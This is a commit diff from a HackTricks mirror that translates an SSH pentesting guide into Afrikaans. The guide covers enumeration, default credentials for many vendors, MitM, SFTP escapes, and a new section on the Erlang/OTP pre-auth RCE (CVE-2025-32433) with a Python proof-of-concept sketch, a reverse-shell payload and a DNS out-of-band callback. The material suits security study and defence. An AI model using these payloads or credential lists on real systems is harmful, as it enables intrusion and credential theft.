maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/network-services-pentesting/pentesting-ssh.md'] to af

Browse Source
This commit is contained in:
Translator 2025-08-14 00:19:45 +00:00
parent 53abec175f
commit 2cb2c545f1
1 changed files with 86 additions and 30 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

112
src/network-services-pentesting/pentesting-ssh.md
View File

@ -14,7 +14,7 @@
- [openSSH](http://www.openssh.org) OpenBSD SSH, verskaf in BSD, Linux verspreidings en Windows sedert Windows 10
- [Dropbear](https://matt.ucc.asn.au/dropbear/dropbear.html) SSH implementasie vir omgewings met lae geheue en verwerker hulpbronne, verskaf in OpenWrt
- [PuTTY](https://www.chiark.greenend.org.uk/~sgtatham/putty/) SSH implementasie vir Windows, die kliënt word algemeen gebruik maar die gebruik van die bediener is selde
- [PuTTY](https://www.chiark.greenend.org.uk/~sgtatham/putty/) SSH implementasie vir Windows, die kliënt word algemeen gebruik, maar die gebruik van die bediener is selde
- [CopSSH](https://www.itefix.net/copssh) implementasie van OpenSSH vir Windows
**SSH biblioteke (wat bediener-kant implementeer):**
@ -32,7 +32,7 @@ nc -vn <IP> 22
```
### Geoutomatiseerde ssh-audit
ssh-audit is 'n hulpmiddel vir ssh bediener & kliënt konfigurasie oudit.
ssh-audit is 'n hulpmiddel vir die oudit van ssh bediener- en kliëntkonfigurasie.
[https://github.com/jtesta/ssh-audit](https://github.com/jtesta/ssh-audit) is 'n opgedateerde fork van [https://github.com/arthepsy/ssh-audit/](https://github.com/arthepsy/ssh-audit/)
@ -41,11 +41,11 @@ ssh-audit is 'n hulpmiddel vir ssh bediener & kliënt konfigurasie oudit.
- SSH1 en SSH2 protokol bedienerondersteuning;
- analiseer SSH kliëntkonfigurasie;
- gryp banner, herken toestel of sagteware en bedryfstelsel, detecteer kompressie;
- versamel sleutel-uitruil, gasheer-sleutel, enkripsie en boodskap verifikasiekode algoritmes;
- voer algoritme-inligting uit (beskikbaar sedert, verwyder/uitgeskakel, onveilig/swak/oud, ens.);
- versamel sleuteluitruil, gasheer-sleutel, enkripsie en boodskapverifikasiekode algoritmes;
- voer algoritme-inligting uit (beskikbaar sedert, verwyder/uitgeskakel, onveilig/ swak/ ou, ens.);
- voer algoritme-aanbevelings uit (voeg by of verwyder gebaseer op herkenbare sagteware weergawe);
- voer sekuriteitsinligting uit (verwante probleme, toegewyde CVE lys, ens.);
- analiseer SSH weergawe kompatibiliteit gebaseer op algoritme-inligting;
- analiseer SSH weergawe-kompatibiliteit gebaseer op algoritme-inligting;
- historiese inligting van OpenSSH, Dropbear SSH en libssh;
- loop op Linux en Windows;
- geen afhanklikhede
@ -69,15 +69,15 @@ use -t to change timeout)
(default: 5)
$ python3 ssh-audit <IP>
```
[Dit in aksie sien (Asciinema)](https://asciinema.org/a/96ejZKxpbuupTK9j7h8BdClzp)
[See it in action (Asciinema)](https://asciinema.org/a/96ejZKxpbuupTK9j7h8BdClzp)
### Publieke SSH-sleutel van bediener
```bash
ssh-keyscan -t rsa <IP> -p <PORT>
```
### Swak Kodeer Algoritmes
### Swak Sif-algoritmes
Dit word standaard deur **nmap** ontdek. Maar jy kan ook **sslcan** of **sslyze** gebruik.
Dit word standaard ontdek deur **nmap**. Maar jy kan ook **sslcan** of **sslyze** gebruik.
### Nmap skripte
```bash
@ -95,7 +95,7 @@ nmap -p22 <ip> --script ssh-auth-methods --script-args="ssh.user=root" # Check a
### Gebruikersnaam Enumerasie
In sommige weergawes van OpenSSH kan jy 'n tydsaanval maak om gebruikers te enumerate. Jy kan 'n metasploit-module gebruik om dit te benut:
In sommige weergawes van OpenSSH kan jy 'n tydaanval maak om gebruikers te enumerate. Jy kan 'n metasploit-module gebruik om dit te benut:
```
msf> use scanner/ssh/ssh_enumusers
```
@ -109,11 +109,11 @@ As jy van sommige ssh private sleutels weet wat gebruik kan word... kom ons prob
```
https://nmap.org/nsedoc/scripts/ssh-publickey-acceptance.html
```
Of die MSF hulpmodule:
Of die MSF bykomende module:
```
msf> use scanner/ssh/ssh_identify_pubkeys
```
Or gebruik `ssh-keybrute.py` (natuurlike python3, liggewig en het erfenis algoritmes geaktiveer): [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute).
Of gebruik `ssh-keybrute.py` (natuurlike python3, liggewig en het erfenis algoritmes geaktiveer): [snowdroppe/ssh-keybrute](https://github.com/snowdroppe/ssh-keybrute).
#### Bekende slegte sleutels kan hier gevind word:
@ -123,7 +123,7 @@ https://github.com/rapid7/ssh-badkeys/tree/master/authorized
#### Swak SSH sleutels / Debian voorspelbare PRNG
Sommige stelsels het bekende foute in die random saad wat gebruik word om kriptografiese materiaal te genereer. Dit kan lei tot 'n dramaties verminderde sleutelruimte wat gebruteforced kan word. Voor-gegenerate stel sleutels wat op Debian stelsels wat deur swak PRNG geraak word, gegenereer is, is hier beskikbaar: [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh).
Sommige stelsels het bekende foute in die ewekansige saad wat gebruik word om kriptografiese materiaal te genereer. Dit kan lei tot 'n dramaties verminderde sleutelruimte wat gebruteforced kan word. Voor-gegeneerde stelle sleutels wat op Debian stelsels wat deur swak PRNG geraak word, gegenereer is, is hier beskikbaar: [g0tmi1k/debian-ssh](https://github.com/g0tmi1k/debian-ssh).
Jy moet hier kyk om geldige sleutels vir die slagoffer masjien te soek.
@ -143,9 +143,9 @@ Vir meer inligting, voer `crackmapexec ssh --help` uit.
| D-Link | admin, gebruiker | privaat, admin, gebruiker |
| Dell | root, gebruiker1, admin, vkernel, cli | calvin, 123456, wagwoord, vkernel, Stor@ge!, admin |
| EMC | admin, root, sysadmin | EMCPMAdm7n, Password#1, Password123#, sysadmin, changeme, emc |
| HP/3Com | admin, root, vcx, app, spvar, bestuur, hpsupport, opc_op | admin, wagwoord, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, nice, toegang, konfig, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC_op, !bestuur, !admin |
| HP/3Com | admin, root, vcx, app, spvar, bestuur, hpsupport, opc_op | admin, wagwoord, hpinvent, iMC123, pvadmin, passw0rd, besgroup, vcx, mooi, toegang, konfig, 3V@rpar, 3V#rpar, procurve, badg3r5, OpC_op, !bestuur, !admin |
| Huawei | admin, root | 123456, admin, root, Admin123, Admin@storage, Huawei12#$, HwDec@01, hwosta2.0, HuaWei123, fsp200@HW, huawei123 |
| IBM | USERID, admin, bestuurder, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, stelsel, toestel, ufmcli, klant | PASSW0RD, passw0rd, admin, wagwoord, Passw8rd, iadmin, apc, 123456, cust0mer |
| IBM | USERID, admin, bestuurder, mqm, db2inst1, db2fenc1, dausr1, db2admin, iadmin, stelsel, toestel, ufmcli, klant | PASSW0RD, passw0rd, admin, wagwoord, Passw8rd, iadmin, apc, 123456, klant0mer |
| Juniper | netscreen | netscreen |
| NetApp | admin | netapp123 |
| Oracle | root, oracle, oravis, applvis, ilom-admin, ilom-operator, nm2user | changeme, ilom-admin, ilom-operator, welcome1, oracle |
@ -153,7 +153,7 @@ Vir meer inligting, voer `crackmapexec ssh --help` uit.
## SSH-MitM
As jy in die plaaslike netwerk is soos die slagoffer wat gaan aansluit by die SSH bediener met gebruikersnaam en wagwoord, kan jy probeer om 'n **MitM-aanval uit te voer om daardie kredensiale te steel:**
As jy in die plaaslike netwerk is soos die slagoffer wat gaan aansluit by die SSH bediener met gebruikersnaam en wagwoord, kan jy probeer om **'n MitM-aanval uit te voer om daardie kredensiale te steel:**
**Aanvalspad:**
@ -163,7 +163,7 @@ As jy in die plaaslike netwerk is soos die slagoffer wat gaan aansluit by die SS
[**SSH MITM**](https://github.com/jtesta/ssh-mitm) doen presies wat hierbo beskryf is.
Om die werklike MitM uit te voer, kan jy tegnieke soos ARP spoofing, DNS spoofing of ander wat in die [**Netwerk Spoofing aanvalle**](../generic-methodologies-and-resources/pentesting-network/index.html#spoofing) beskryf word, gebruik.
Om die werklike MitM uit te voer, kan jy tegnieke soos ARP spoofing, DNS spoofing of ander wat beskryf word in die [**Netwerk Spoofing aanvalle**](../generic-methodologies-and-resources/pentesting-network/index.html#spoofing) gebruik.
## SSH-Snake
@ -176,13 +176,13 @@ SSH-Snake voer die volgende take outomaties en herhalend uit:
3. Probeer om SSH in al die bestemmings in te gaan met al die ontdekte privaat sleutels,
4. As 'n bestemming suksesvol gekoppel is, herhaal stappe #1 - #4 op die gekoppelde stelsel.
Dit is heeltemal self-repliserend en self-propagasies -- en heeltemal fileloos.
Dit is heeltemal self-repliserend en self-propagasies -- en heeltemal vry van lêers.
## Konfig Misconfigurasies
### Root aanmelding
Dit is algemeen dat SSH bedieners root gebruiker aanmelding standaard toelaat, wat 'n beduidende sekuriteitsrisiko inhou. **Deaktiveer root aanmelding** is 'n kritieke stap in die beveiliging van die bediener. Ongeoorloofde toegang met administratiewe regte en gebruteforceerde aanvalle kan verminder word deur hierdie verandering te maak.
Dit is algemeen dat SSH bedieners standaard root gebruiker aanmelding toelaat, wat 'n beduidende sekuriteitsrisiko inhou. **Deaktiveer root aanmelding** is 'n kritieke stap in die beveiliging van die bediener. Ongeautoriseerde toegang met administratiewe regte en gebruteforceerde aanvalle kan verminder word deur hierdie verandering te maak.
**Om Root Aanmelding in OpenSSH te Deaktiveer:**
@ -197,7 +197,7 @@ Dit is algemeen dat SSH bedieners root gebruiker aanmelding standaard toelaat, w
### SFTP opdraguitvoering
Daar is 'n algemene oorsig wat plaasvind met SFTP opstellings, waar administrateurs bedoel dat gebruikers lêers moet uitruil sonder om afstandshell toegang te aktiveer. Ten spyte van die instelling van gebruikers met nie-interaktiewe shells (bv. `/usr/bin/nologin`) en hulle te beperk tot 'n spesifieke gids, bly 'n sekuriteitslek. **Gebruikers kan hierdie beperkings omseil** deur die uitvoering van 'n opdrag (soos `/bin/bash`) onmiddellik na aanmelding te vra, voordat hul aangewese nie-interaktiewe shell oorneem. Dit stel ongeoorloofde opdraguitvoering in staat, wat die beoogde sekuriteitsmaatreëls ondermyn.
Daar is 'n algemene oorsig wat plaasvind met SFTP opstellings, waar administrateurs bedoel dat gebruikers lêers moet uitruil sonder om afstandshell toegang te aktiveer. Ten spyte van die instelling van gebruikers met nie-interaktiewe shells (bv. `/usr/bin/nologin`) en hulle te beperk tot 'n spesifieke gids, bly 'n sekuriteitslek. **Gebruikers kan hierdie beperkings omseil** deur die uitvoering van 'n opdrag (soos `/bin/bash`) onmiddellik na aanmelding te vra, voordat hul aangewese nie-interaktiewe shell oorneem. Dit stel ongeautoriseerde opdraguitvoering in staat, wat die bedoelde sekuriteitsmaatreëls ondermyn.
[Voorbeeld van hier](https://community.turgensec.com/ssh-hacking-guide/):
```bash
@ -242,7 +242,7 @@ sudo ssh -L <local_port>:<remote_host>:<remote_port> -N -f <username>@<ip_compro
```
### SFTP Symlink
Die **sftp** het die opdrag "**symlink**". Daarom, as jy **skryfrechte** in 'n sekere gids het, kan jy **symlinks** van **ander gidse/lêers** skep. Aangesien jy waarskynlik **gevang** is binne 'n chroot, sal dit **nie spesiaal nuttig** vir jou wees nie, maar, as jy die geskepte **symlink** van 'n **no-chroot** **diens** kan **toegang** (byvoorbeeld, as jy die symlink van die web kan toegang), kan jy die **symlinked lêers deur die web** **oopmaak**.
Die **sftp** het die opdrag "**symlink**". Daarom, as jy **skryfrechte** in 'n sekere gids het, kan jy **symlinks** van **ander gidse/lêers** skep. Aangesien jy waarskynlik **gevang** is binne 'n chroot, sal dit **nie spesiaal nuttig** vir jou wees nie, maar as jy die geskepte **symlink** van 'n **no-chroot** **diens** kan **toegang** (byvoorbeeld, as jy die symlink van die web kan toegang), kan jy die **symlinked lêers deur die web** **oopmaak**.
Byvoorbeeld, om 'n **symlink** van 'n nuwe lêer **"**_**froot**_**" na "**_**/**_**"** te skep:
```bash
@ -250,24 +250,24 @@ sftp> symlink / froot
```
As jy toegang tot die lêer "_froot_" via die web kan kry, sal jy in staat wees om die wortel ("/") gids van die stelsel te lys.
### Verifikasie metodes
### Outentikasie metodes
In 'n hoë sekuriteit omgewing is dit 'n algemene praktyk om slegs sleutel-gebaseerde of twee-faktor verifikasie in te skakel eerder as die eenvoudige faktor wagwoord-gebaseerde verifikasie. Maar dikwels word die sterker verifikasie metodes geaktiveer sonder om die swakkeres te deaktiveer. 'n Gereelde geval is om `publickey` op openSSH-konfigurasie in te skakel en dit as die standaard metode in te stel, maar nie `password` te deaktiveer nie. So deur die uitgebreide modus van die SSH-kliënt te gebruik, kan 'n aanvaller sien dat 'n swakker metode geaktiveer is:
In 'n hoë sekuriteit omgewing is dit 'n algemene praktyk om slegs sleutel-gebaseerde of twee-faktor outentikasie in te skakel eerder as die eenvoudige faktor wagwoord-gebaseerde outentikasie. Maar dikwels word die sterker outentikasie metodes geaktiveer sonder om die swakkeres te deaktiveer. 'n Gereelde geval is om `publickey` op openSSH-konfigurasie in te skakel en dit as die standaardmetode in te stel, maar nie `password` te deaktiveer nie. So deur die uitgebreide modus van die SSH-kliënt te gebruik, kan 'n aanvaller sien dat 'n swakker metode geaktiveer is:
```bash
ssh -v 192.168.1.94
OpenSSH_8.1p1, OpenSSL 1.1.1d 10 Sep 2019
...
debug1: Authentications that can continue: publickey,password,keyboard-interactive
```
As 'n beperking op die aantal autentikasiefoute gestel is en jy nooit die kans kry om die wagwoordmetode te bereik nie, kan jy die `PreferredAuthentications` opsie gebruik om te dwing om hierdie metode te gebruik.
Byvoorbeeld, as 'n outentikasie-foutgrens gestel is en jy nooit die kans kry om die wagwoordmetode te bereik nie, kan jy die `PreferredAuthentications` opsie gebruik om te dwing om hierdie metode te gebruik.
```bash
ssh -v 192.168.1.94 -o PreferredAuthentications=password
...
debug1: Next authentication method: password
```
Die hersiening van die SSH-bediener konfigurasie is nodig om te kontroleer dat slegs verwagte metodes gemagtig is. Die gebruik van die uitgebreide modus op die kliënt kan help om die doeltreffendheid van die konfigurasie te sien.
Hersien die SSH-bediener konfigurasie is nodig om te verifieer dat slegs verwagte metodes gemagtig is. Om die uitgebreide modus op die kliënt te gebruik, kan help om die doeltreffendheid van die konfigurasie te sien.
### Config files
### Config lêers
```bash
ssh_config
sshd_config
@ -281,12 +281,68 @@ id_rsa
- [https://packetstormsecurity.com/files/download/71252/sshfuzz.txt](https://packetstormsecurity.com/files/download/71252/sshfuzz.txt)
- [https://www.rapid7.com/db/modules/auxiliary/fuzzers/ssh/ssh_version_2](https://www.rapid7.com/db/modules/auxiliary/fuzzers/ssh/ssh_version_2)
## Verifikasie Toestand-Masjien Omseiling (Pre-Auth RCE)
Verskeie SSH bediener implementasies bevat logika foute in die **verifikasie eindige toestand masjien** wat 'n kliënt toelaat om *verbinding-protokol* boodskappe **voor** verifikasie voltooi is, te stuur. Omdat die bediener nie verifieer dat dit in die korrekte toestand is nie, word daardie boodskappe hanteer asof die gebruiker ten volle geverifieer is, wat lei tot **ongeverifieerde kode uitvoering** of sessie skepping.
Op 'n protokolvlak behoort enige SSH boodskap met 'n _boodskap kode_ **≥ 80** (0x50) tot die *verbinding* laag (RFC 4254) en moet **slegs aanvaar word na suksesvolle verifikasie** (RFC 4252). As die bediener een van daardie boodskappe verwerk terwyl dit steeds in die *SSH_AUTHENTICATION* toestand is, kan die aanvaller onmiddellik 'n kanaal skep en aksies soos opdrag uitvoering, poort-voorwaartse, ens. versoek.
### Generiese Exploitasiestappe
1. Stel 'n TCP verbinding op met die teiken se SSH poort (gewoonlik 22, maar ander dienste kan Erlang/OTP op 2022, 830, 2222… blootstel).
2. Skep 'n rou SSH pakket:
* 4-byte **pakket_lengte** (big-endian)
* 1-byte **boodskap_kode** ≥ 80 (bv. `SSH_MSG_CHANNEL_OPEN` = 90, `SSH_MSG_CHANNEL_REQUEST` = 98)
* Payload wat verstaan sal word deur die gekose boodskap tipe
3. Stuur die pakket(te) **voor enige verifikasie stap voltooi is**.
4. Interaksie met die bediener API's wat nou _pre-auth_ blootgestel is (opdrag uitvoering, poort forwarding, lêerstelsel toegang, …).
Python bewys-van-konsep skets:
```python
import socket, struct
HOST, PORT = '10.10.10.10', 22
s = socket.create_connection((HOST, PORT))
# skip version exchange for brevity send your own client banner then read server banner
# … key exchange can be skipped on vulnerable Erlang/OTP because the bug is hit immediately after the banner
# Packet: len(1)=1, SSH_MSG_CHANNEL_OPEN (90)
pkt = struct.pack('>I', 1) + b'\x5a' # 0x5a = 90
s.sendall(pkt)
# additional CHANNEL_REQUEST packets can follow to run commands
```
In praktyk sal jy die sleuteluitruiling moet uitvoer (of oorslaan) volgens die teikenimplementasie, maar **geen outentisering** word ooit uitgevoer nie.
---
### Erlang/OTP `sshd` (CVE-2025-32433)
* **Geraakte weergawes:** OTP < 27.3.3, 26.2.5.11, 25.3.2.20
* **Oorsaak:** die Erlang inheemse SSH daemon valideer nie die huidige toestand voordat dit `ssh_connection:handle_msg/2` aanroep nie. Daarom bereik enige pakket met 'n boodskapkode 80-255 die verbindinghandler terwyl die sessie steeds in die *userauth* toestand is.
* **Impak:** ongeoutentiseerde **afgeleë kode-uitvoering** (die daemon loop gewoonlik as **root** op ingebedde/OT toestelle).
Voorbeeldpayload wat 'n omgekeerde skulp genereer wat aan die aanvaller-beheerde kanaal gekoppel is:
```erlang
% open a channel first … then:
execSinet:cmd(Channel, "exec('/bin/sh', ['-i'], [{fd, Channel#channel.fd}, {pid, true}]).").
```
Blind RCE / out-of-band opsporing kan uitgevoer word via DNS:
```erlang
execSinet:gethostbyname("<random>.dns.outbound.watchtowr.com").Zsession
```
Detection & Mitigation:
* Inspecteer SSH-verkeer: **verwerp enige pakket met boodskapkode ≥ 80 waargeneem voor outentisering**.
* Opgradeer Erlang/OTP na **27.3.3 / 26.2.5.11 / 25.3.2.20** of nuwer.
* Beperk blootstelling van bestuurspoorte (22/2022/830/2222) veral op OT-toerusting.
---
### Ander Implementasies Aangetas
* **libssh** 0.6 0.8 (bedienerkant) **CVE-2018-10933** aanvaar 'n nie-geoutentiseerde `SSH_MSG_USERAUTH_SUCCESS` gestuur deur die kliënt, effektief die omgekeerde logika-fout.
Die algemene les is dat enige afwyking van die RFC-voorgeskrewe toestandsoorgange dodelik kan wees; wanneer jy SSH-daemons hersien of fuzz, let veral op *toestandmasjien afdwinging*.
## References
- Jy kan interessante gidse vind oor hoe om SSH te versterk in [https://www.ssh-audit.com/hardening_guides.html](https://www.ssh-audit.com/hardening_guides.html)
- [https://community.turgensec.com/ssh-hacking-guide](https://community.turgensec.com/ssh-hacking-guide)
- [Unit 42 Erlang/OTP SSH CVE-2025-32433](https://unit42.paloaltonetworks.com/erlang-otp-cve-2025-32433/)
- [SSH hardening guides](https://www.ssh-audit.com/hardening_guides.html)
- [Turgensec SSH hacking guide](https://community.turgensec.com/ssh-hacking-guide)
## HackTricks Automatiese Opdragte
## HackTricks Automatic Commands
```
Protocol_Name: SSH
Port_Number: 22